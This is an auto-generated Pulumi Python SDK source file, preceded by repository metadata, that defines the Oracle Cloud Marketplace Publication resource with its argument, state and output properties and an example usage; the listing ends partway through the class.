| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8ebd52a1a99384cb10649ee6afe5de1a52fd3f8e
| 42,657
|
py
|
Python
|
sdk/python/pulumi_oci/marketplace/publication.py
|
EladGabay/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 5
|
2021-08-17T11:14:46.000Z
|
2021-12-31T02:07:03.000Z
|
sdk/python/pulumi_oci/marketplace/publication.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-09-06T11:21:29.000Z
|
2021-09-06T11:21:29.000Z
|
sdk/python/pulumi_oci/marketplace/publication.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2021-08-24T23:31:30.000Z
|
2022-01-02T19:26:54.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['PublicationArgs', 'Publication']
@pulumi.input_type
class PublicationArgs:
def __init__(__self__, *,
compartment_id: pulumi.Input[str],
is_agreement_acknowledged: pulumi.Input[bool],
listing_type: pulumi.Input[str],
package_details: pulumi.Input['PublicationPackageDetailsArgs'],
short_description: pulumi.Input[str],
support_contacts: pulumi.Input[Sequence[pulumi.Input['PublicationSupportContactArgs']]],
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
long_description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Publication resource.
:param pulumi.Input[str] compartment_id: (Updatable) The OCID of the compartment to create the resource within.
:param pulumi.Input[bool] is_agreement_acknowledged: Acknowledgement that invoker has the right and authority to share this Community Image in accordance with their agreement with Oracle applicable to the Services and the related Service Specifications
:param pulumi.Input[str] listing_type: In which catalog the listing should exist.
:param pulumi.Input['PublicationPackageDetailsArgs'] package_details: A base object for the properties of the package
:param pulumi.Input[str] short_description: (Updatable) short description of the catalog listing
:param pulumi.Input[Sequence[pulumi.Input['PublicationSupportContactArgs']]] support_contacts: (Updatable) Contact information to use to get support from the publisher for the listing.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) The defined tags associated with this resource, if any. Each key is predefined and scoped to namespaces. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) The freeform tags associated with this resource, if any. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[str] long_description: (Updatable) short description of the catalog listing
:param pulumi.Input[str] name: (Updatable) The name of the contact.
"""
pulumi.set(__self__, "compartment_id", compartment_id)
pulumi.set(__self__, "is_agreement_acknowledged", is_agreement_acknowledged)
pulumi.set(__self__, "listing_type", listing_type)
pulumi.set(__self__, "package_details", package_details)
pulumi.set(__self__, "short_description", short_description)
pulumi.set(__self__, "support_contacts", support_contacts)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if long_description is not None:
pulumi.set(__self__, "long_description", long_description)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Input[str]:
"""
(Updatable) The OCID of the compartment to create the resource within.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: pulumi.Input[str]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter(name="isAgreementAcknowledged")
def is_agreement_acknowledged(self) -> pulumi.Input[bool]:
"""
Acknowledgement that invoker has the right and authority to share this Community Image in accordance with their agreement with Oracle applicable to the Services and the related Service Specifications
"""
return pulumi.get(self, "is_agreement_acknowledged")
@is_agreement_acknowledged.setter
def is_agreement_acknowledged(self, value: pulumi.Input[bool]):
pulumi.set(self, "is_agreement_acknowledged", value)
@property
@pulumi.getter(name="listingType")
def listing_type(self) -> pulumi.Input[str]:
"""
In which catalog the listing should exist.
"""
return pulumi.get(self, "listing_type")
@listing_type.setter
def listing_type(self, value: pulumi.Input[str]):
pulumi.set(self, "listing_type", value)
@property
@pulumi.getter(name="packageDetails")
def package_details(self) -> pulumi.Input['PublicationPackageDetailsArgs']:
"""
A base object for the properties of the package
"""
return pulumi.get(self, "package_details")
@package_details.setter
def package_details(self, value: pulumi.Input['PublicationPackageDetailsArgs']):
pulumi.set(self, "package_details", value)
@property
@pulumi.getter(name="shortDescription")
def short_description(self) -> pulumi.Input[str]:
"""
(Updatable) short description of the catalog listing
"""
return pulumi.get(self, "short_description")
@short_description.setter
def short_description(self, value: pulumi.Input[str]):
pulumi.set(self, "short_description", value)
@property
@pulumi.getter(name="supportContacts")
def support_contacts(self) -> pulumi.Input[Sequence[pulumi.Input['PublicationSupportContactArgs']]]:
"""
(Updatable) Contact information to use to get support from the publisher for the listing.
"""
return pulumi.get(self, "support_contacts")
@support_contacts.setter
def support_contacts(self, value: pulumi.Input[Sequence[pulumi.Input['PublicationSupportContactArgs']]]):
pulumi.set(self, "support_contacts", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) The defined tags associated with this resource, if any. Each key is predefined and scoped to namespaces. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) The freeform tags associated with this resource, if any. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter(name="longDescription")
def long_description(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) short description of the catalog listing
"""
return pulumi.get(self, "long_description")
@long_description.setter
def long_description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "long_description", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The name of the contact.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class _PublicationState:
def __init__(__self__, *,
compartment_id: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
icon: Optional[pulumi.Input['PublicationIconArgs']] = None,
is_agreement_acknowledged: Optional[pulumi.Input[bool]] = None,
listing_type: Optional[pulumi.Input[str]] = None,
long_description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
package_details: Optional[pulumi.Input['PublicationPackageDetailsArgs']] = None,
package_type: Optional[pulumi.Input[str]] = None,
short_description: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
support_contacts: Optional[pulumi.Input[Sequence[pulumi.Input['PublicationSupportContactArgs']]]] = None,
supported_operating_systems: Optional[pulumi.Input[Sequence[pulumi.Input['PublicationSupportedOperatingSystemArgs']]]] = None,
time_created: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Publication resources.
:param pulumi.Input[str] compartment_id: (Updatable) The OCID of the compartment to create the resource within.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) The defined tags associated with this resource, if any. Each key is predefined and scoped to namespaces. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) The freeform tags associated with this resource, if any. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input['PublicationIconArgs'] icon: The model for upload data for images and icons.
:param pulumi.Input[bool] is_agreement_acknowledged: Acknowledgement that invoker has the right and authority to share this Community Image in accordance with their agreement with Oracle applicable to the Services and the related Service Specifications
:param pulumi.Input[str] listing_type: In which catalog the listing should exist.
:param pulumi.Input[str] long_description: (Updatable) short description of the catalog listing
:param pulumi.Input[str] name: (Updatable) The name of the contact.
:param pulumi.Input['PublicationPackageDetailsArgs'] package_details: A base object for the properties of the package
:param pulumi.Input[str] package_type: Type of the artifact of the listing
:param pulumi.Input[str] short_description: (Updatable) short description of the catalog listing
:param pulumi.Input[str] state: The state of the listing in its lifecycle
:param pulumi.Input[Sequence[pulumi.Input['PublicationSupportContactArgs']]] support_contacts: (Updatable) Contact information to use to get support from the publisher for the listing.
:param pulumi.Input[Sequence[pulumi.Input['PublicationSupportedOperatingSystemArgs']]] supported_operating_systems: List of operating systems supprted.
:param pulumi.Input[str] time_created: The date and time this publication was created, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2016-08-25T21:10:29.600Z`
"""
if compartment_id is not None:
pulumi.set(__self__, "compartment_id", compartment_id)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if icon is not None:
pulumi.set(__self__, "icon", icon)
if is_agreement_acknowledged is not None:
pulumi.set(__self__, "is_agreement_acknowledged", is_agreement_acknowledged)
if listing_type is not None:
pulumi.set(__self__, "listing_type", listing_type)
if long_description is not None:
pulumi.set(__self__, "long_description", long_description)
if name is not None:
pulumi.set(__self__, "name", name)
if package_details is not None:
pulumi.set(__self__, "package_details", package_details)
if package_type is not None:
pulumi.set(__self__, "package_type", package_type)
if short_description is not None:
pulumi.set(__self__, "short_description", short_description)
if state is not None:
pulumi.set(__self__, "state", state)
if support_contacts is not None:
pulumi.set(__self__, "support_contacts", support_contacts)
if supported_operating_systems is not None:
pulumi.set(__self__, "supported_operating_systems", supported_operating_systems)
if time_created is not None:
pulumi.set(__self__, "time_created", time_created)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The OCID of the compartment to create the resource within.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) The defined tags associated with this resource, if any. Each key is predefined and scoped to namespaces. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) The freeform tags associated with this resource, if any. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter
def icon(self) -> Optional[pulumi.Input['PublicationIconArgs']]:
"""
The model for upload data for images and icons.
"""
return pulumi.get(self, "icon")
@icon.setter
def icon(self, value: Optional[pulumi.Input['PublicationIconArgs']]):
pulumi.set(self, "icon", value)
@property
@pulumi.getter(name="isAgreementAcknowledged")
def is_agreement_acknowledged(self) -> Optional[pulumi.Input[bool]]:
"""
Acknowledgement that invoker has the right and authority to share this Community Image in accordance with their agreement with Oracle applicable to the Services and the related Service Specifications
"""
return pulumi.get(self, "is_agreement_acknowledged")
@is_agreement_acknowledged.setter
def is_agreement_acknowledged(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_agreement_acknowledged", value)
@property
@pulumi.getter(name="listingType")
def listing_type(self) -> Optional[pulumi.Input[str]]:
"""
In which catalog the listing should exist.
"""
return pulumi.get(self, "listing_type")
@listing_type.setter
def listing_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "listing_type", value)
@property
@pulumi.getter(name="longDescription")
def long_description(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) short description of the catalog listing
"""
return pulumi.get(self, "long_description")
@long_description.setter
def long_description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "long_description", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The name of the contact.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="packageDetails")
def package_details(self) -> Optional[pulumi.Input['PublicationPackageDetailsArgs']]:
"""
A base object for the properties of the package
"""
return pulumi.get(self, "package_details")
@package_details.setter
def package_details(self, value: Optional[pulumi.Input['PublicationPackageDetailsArgs']]):
pulumi.set(self, "package_details", value)
@property
@pulumi.getter(name="packageType")
def package_type(self) -> Optional[pulumi.Input[str]]:
"""
Type of the artifact of the listing
"""
return pulumi.get(self, "package_type")
@package_type.setter
def package_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "package_type", value)
@property
@pulumi.getter(name="shortDescription")
def short_description(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) short description of the catalog listing
"""
return pulumi.get(self, "short_description")
@short_description.setter
def short_description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "short_description", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input[str]]:
"""
The state of the listing in its lifecycle
"""
return pulumi.get(self, "state")
@state.setter
def state(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "state", value)
@property
@pulumi.getter(name="supportContacts")
def support_contacts(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PublicationSupportContactArgs']]]]:
"""
(Updatable) Contact information to use to get support from the publisher for the listing.
"""
return pulumi.get(self, "support_contacts")
@support_contacts.setter
def support_contacts(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PublicationSupportContactArgs']]]]):
pulumi.set(self, "support_contacts", value)
@property
@pulumi.getter(name="supportedOperatingSystems")
def supported_operating_systems(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PublicationSupportedOperatingSystemArgs']]]]:
"""
List of operating systems supprted.
"""
return pulumi.get(self, "supported_operating_systems")
@supported_operating_systems.setter
def supported_operating_systems(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PublicationSupportedOperatingSystemArgs']]]]):
pulumi.set(self, "supported_operating_systems", value)
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> Optional[pulumi.Input[str]]:
"""
The date and time this publication was created, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2016-08-25T21:10:29.600Z`
"""
return pulumi.get(self, "time_created")
@time_created.setter
def time_created(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_created", value)
class Publication(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
is_agreement_acknowledged: Optional[pulumi.Input[bool]] = None,
listing_type: Optional[pulumi.Input[str]] = None,
long_description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
package_details: Optional[pulumi.Input[pulumi.InputType['PublicationPackageDetailsArgs']]] = None,
short_description: Optional[pulumi.Input[str]] = None,
support_contacts: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PublicationSupportContactArgs']]]]] = None,
__props__=None):
"""
This resource provides the Publication resource in Oracle Cloud Infrastructure Marketplace service.
Creates a publication of the given type with an optional default package
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_publication = oci.marketplace.Publication("testPublication",
compartment_id=var["compartment_id"],
is_agreement_acknowledged=var["publication_is_agreement_acknowledged"],
listing_type=var["publication_listing_type"],
package_details=oci.marketplace.PublicationPackageDetailsArgs(
eulas=[oci.marketplace.PublicationPackageDetailsEulaArgs(
eula_type=var["publication_package_details_eula_eula_type"],
license_text=var["publication_package_details_eula_license_text"],
)],
operating_system=oci.marketplace.PublicationPackageDetailsOperatingSystemArgs(
name=var["publication_package_details_operating_system_name"],
),
package_type=var["publication_package_details_package_type"],
package_version=var["publication_package_details_package_version"],
image_id=oci_core_image["test_image"]["id"],
),
short_description=var["publication_short_description"],
support_contacts=[oci.marketplace.PublicationSupportContactArgs(
email=var["publication_support_contacts_email"],
name=var["publication_support_contacts_name"],
phone=var["publication_support_contacts_phone"],
subject=var["publication_support_contacts_subject"],
)],
defined_tags={
"Operations.CostCenter": "42",
},
freeform_tags={
"Department": "Finance",
},
long_description=var["publication_long_description"])
```
## Import
Publications can be imported using the `id`, e.g.
```sh
$ pulumi import oci:marketplace/publication:Publication test_publication "id"
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] compartment_id: (Updatable) The OCID of the compartment to create the resource within.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) The defined tags associated with this resource, if any. Each key is predefined and scoped to namespaces. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) The freeform tags associated with this resource, if any. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[bool] is_agreement_acknowledged: Acknowledgement that invoker has the right and authority to share this Community Image in accordance with their agreement with Oracle applicable to the Services and the related Service Specifications
:param pulumi.Input[str] listing_type: In which catalog the listing should exist.
:param pulumi.Input[str] long_description: (Updatable) short description of the catalog listing
:param pulumi.Input[str] name: (Updatable) The name of the contact.
:param pulumi.Input[pulumi.InputType['PublicationPackageDetailsArgs']] package_details: A base object for the properties of the package
:param pulumi.Input[str] short_description: (Updatable) short description of the catalog listing
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PublicationSupportContactArgs']]]] support_contacts: (Updatable) Contact information to use to get support from the publisher for the listing.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: PublicationArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
This resource provides the Publication resource in Oracle Cloud Infrastructure Marketplace service.
Creates a publication of the given type with an optional default package
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_publication = oci.marketplace.Publication("testPublication",
compartment_id=var["compartment_id"],
is_agreement_acknowledged=var["publication_is_agreement_acknowledged"],
listing_type=var["publication_listing_type"],
package_details=oci.marketplace.PublicationPackageDetailsArgs(
eulas=[oci.marketplace.PublicationPackageDetailsEulaArgs(
eula_type=var["publication_package_details_eula_eula_type"],
license_text=var["publication_package_details_eula_license_text"],
)],
operating_system=oci.marketplace.PublicationPackageDetailsOperatingSystemArgs(
name=var["publication_package_details_operating_system_name"],
),
package_type=var["publication_package_details_package_type"],
package_version=var["publication_package_details_package_version"],
image_id=oci_core_image["test_image"]["id"],
),
short_description=var["publication_short_description"],
support_contacts=[oci.marketplace.PublicationSupportContactArgs(
email=var["publication_support_contacts_email"],
name=var["publication_support_contacts_name"],
phone=var["publication_support_contacts_phone"],
subject=var["publication_support_contacts_subject"],
)],
defined_tags={
"Operations.CostCenter": "42",
},
freeform_tags={
"Department": "Finance",
},
long_description=var["publication_long_description"])
```
## Import
Publications can be imported using the `id`, e.g.
```sh
$ pulumi import oci:marketplace/publication:Publication test_publication "id"
```
:param str resource_name: The name of the resource.
:param PublicationArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(PublicationArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
is_agreement_acknowledged: Optional[pulumi.Input[bool]] = None,
listing_type: Optional[pulumi.Input[str]] = None,
long_description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
package_details: Optional[pulumi.Input[pulumi.InputType['PublicationPackageDetailsArgs']]] = None,
short_description: Optional[pulumi.Input[str]] = None,
support_contacts: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PublicationSupportContactArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = PublicationArgs.__new__(PublicationArgs)
if compartment_id is None and not opts.urn:
raise TypeError("Missing required property 'compartment_id'")
__props__.__dict__["compartment_id"] = compartment_id
__props__.__dict__["defined_tags"] = defined_tags
__props__.__dict__["freeform_tags"] = freeform_tags
if is_agreement_acknowledged is None and not opts.urn:
raise TypeError("Missing required property 'is_agreement_acknowledged'")
__props__.__dict__["is_agreement_acknowledged"] = is_agreement_acknowledged
if listing_type is None and not opts.urn:
raise TypeError("Missing required property 'listing_type'")
__props__.__dict__["listing_type"] = listing_type
__props__.__dict__["long_description"] = long_description
__props__.__dict__["name"] = name
if package_details is None and not opts.urn:
raise TypeError("Missing required property 'package_details'")
__props__.__dict__["package_details"] = package_details
if short_description is None and not opts.urn:
raise TypeError("Missing required property 'short_description'")
__props__.__dict__["short_description"] = short_description
if support_contacts is None and not opts.urn:
raise TypeError("Missing required property 'support_contacts'")
__props__.__dict__["support_contacts"] = support_contacts
__props__.__dict__["icon"] = None
__props__.__dict__["package_type"] = None
__props__.__dict__["state"] = None
__props__.__dict__["supported_operating_systems"] = None
__props__.__dict__["time_created"] = None
super(Publication, __self__).__init__(
'oci:marketplace/publication:Publication',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
icon: Optional[pulumi.Input[pulumi.InputType['PublicationIconArgs']]] = None,
is_agreement_acknowledged: Optional[pulumi.Input[bool]] = None,
listing_type: Optional[pulumi.Input[str]] = None,
long_description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
package_details: Optional[pulumi.Input[pulumi.InputType['PublicationPackageDetailsArgs']]] = None,
package_type: Optional[pulumi.Input[str]] = None,
short_description: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
support_contacts: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PublicationSupportContactArgs']]]]] = None,
supported_operating_systems: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PublicationSupportedOperatingSystemArgs']]]]] = None,
time_created: Optional[pulumi.Input[str]] = None) -> 'Publication':
"""
Get an existing Publication resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] compartment_id: (Updatable) The OCID of the compartment to create the resource within.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) The defined tags associated with this resource, if any. Each key is predefined and scoped to namespaces. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) The freeform tags associated with this resource, if any. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[pulumi.InputType['PublicationIconArgs']] icon: The model for upload data for images and icons.
:param pulumi.Input[bool] is_agreement_acknowledged: Acknowledgement that invoker has the right and authority to share this Community Image in accordance with their agreement with Oracle applicable to the Services and the related Service Specifications
:param pulumi.Input[str] listing_type: In which catalog the listing should exist.
:param pulumi.Input[str] long_description: (Updatable) short description of the catalog listing
:param pulumi.Input[str] name: (Updatable) The name of the contact.
:param pulumi.Input[pulumi.InputType['PublicationPackageDetailsArgs']] package_details: A base object for the properties of the package
:param pulumi.Input[str] package_type: Type of the artifact of the listing
:param pulumi.Input[str] short_description: (Updatable) short description of the catalog listing
:param pulumi.Input[str] state: The state of the listing in its lifecycle
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PublicationSupportContactArgs']]]] support_contacts: (Updatable) Contact information to use to get support from the publisher for the listing.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PublicationSupportedOperatingSystemArgs']]]] supported_operating_systems: List of operating systems supprted.
:param pulumi.Input[str] time_created: The date and time this publication was created, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2016-08-25T21:10:29.600Z`
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _PublicationState.__new__(_PublicationState)
__props__.__dict__["compartment_id"] = compartment_id
__props__.__dict__["defined_tags"] = defined_tags
__props__.__dict__["freeform_tags"] = freeform_tags
__props__.__dict__["icon"] = icon
__props__.__dict__["is_agreement_acknowledged"] = is_agreement_acknowledged
__props__.__dict__["listing_type"] = listing_type
__props__.__dict__["long_description"] = long_description
__props__.__dict__["name"] = name
__props__.__dict__["package_details"] = package_details
__props__.__dict__["package_type"] = package_type
__props__.__dict__["short_description"] = short_description
__props__.__dict__["state"] = state
__props__.__dict__["support_contacts"] = support_contacts
__props__.__dict__["supported_operating_systems"] = supported_operating_systems
__props__.__dict__["time_created"] = time_created
return Publication(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Output[str]:
"""
(Updatable) The OCID of the compartment to create the resource within.
"""
return pulumi.get(self, "compartment_id")
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) The defined tags associated with this resource, if any. Each key is predefined and scoped to namespaces. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
"""
return pulumi.get(self, "defined_tags")
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) The freeform tags associated with this resource, if any. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
"""
return pulumi.get(self, "freeform_tags")
@property
@pulumi.getter
def icon(self) -> pulumi.Output['outputs.PublicationIcon']:
"""
The model for upload data for images and icons.
"""
return pulumi.get(self, "icon")
@property
@pulumi.getter(name="isAgreementAcknowledged")
def is_agreement_acknowledged(self) -> pulumi.Output[bool]:
"""
Acknowledgement that invoker has the right and authority to share this Community Image in accordance with their agreement with Oracle applicable to the Services and the related Service Specifications
"""
return pulumi.get(self, "is_agreement_acknowledged")
@property
@pulumi.getter(name="listingType")
def listing_type(self) -> pulumi.Output[str]:
"""
In which catalog the listing should exist.
"""
return pulumi.get(self, "listing_type")
@property
@pulumi.getter(name="longDescription")
def long_description(self) -> pulumi.Output[str]:
"""
(Updatable) short description of the catalog listing
"""
return pulumi.get(self, "long_description")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
(Updatable) The name of the contact.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="packageDetails")
